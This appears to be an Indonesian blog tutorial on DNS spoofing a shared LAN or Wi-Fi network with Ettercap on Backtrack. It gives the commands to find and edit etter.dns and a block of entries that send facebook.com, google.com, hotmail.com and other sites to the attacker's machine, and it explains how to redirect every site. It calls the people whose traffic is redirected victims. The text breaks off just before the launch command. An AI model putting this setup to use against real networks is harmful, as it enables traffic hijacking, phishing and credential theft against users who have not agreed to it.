Dns spoof dengan ettercap gui

dulu saya pernah posting cara DNS spoofing di Windows menggunakan Cain and Abel...

sekarang saya mau share Dns spoofing di Backtrack dengan Ettercap...

kebetulan masih byk yang belum tau dengan statusbaru.com ( jejaring sosial buatan Indonesia ) makanya kita alihkan www.facebook.com pada jaringan kabel ( LAN ) ataupun Wireles...

berikut POC nya

Atur dulu dns spoof nya
buka console lalu ketikkan perintah

locate etter.dns

untuk mengetahui letak pengaturan ettercap

kemudian atur dns spoofnya di pengaturan etter.dns

gedit /usr/local/share/ettercap/etter.dns

rubah ipnya menjadi ip kamu disini ip komputer saya 192.168.1.21
rubah di bagian ini

################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
www.mercadolivre.com.br A 192.168.1.74
*.globo.com        A   192.168.1.74
globo.com          A   192.168.1.74
www.msn.com        A   192.168.1.74
www.hotmail.com    A   192.168.1.74
*.hotmail.com      A   192.168.1.74
www.globo.com      A   192.168.1.74
www.orkut.com      A   192.168.1.74
*.orkut.com        A   192.168.1.74
www.google.com     A   192.168.1.74
*.google.com       A   192.168.1.74
microsoft.com      A   192.168.1.74
*.microsoft.com    A   192.168.1.74
www.facebook.com      A   192.168.1.74
*.facebook.com        A   192.168.1.74
www.microsoft.com PTR 192.168.1.74      # Wildcards in PTR are not allowed

Kita akan spoofing facebook apabila ada korban yang membuka facebook akan di arahkan ke ip kita

KALAU INGIN SEMUA SITUS DI SPOOFING CUKUP TAMBAHKAN
*A (ip pc anda) misal = *A 192.168.1.74
pada bagian bawah sendiri.Di bawah #vim:ts=8:noexpandtab

setelah itu save dengan menekan cxtr+x lalu y dan enter
Sekarang tinggal memulai spoof dengan ettercap dengan gui agar hasil maksimal untuk spoof_dns
buka terminal dan jalankan ettercap dengan perintah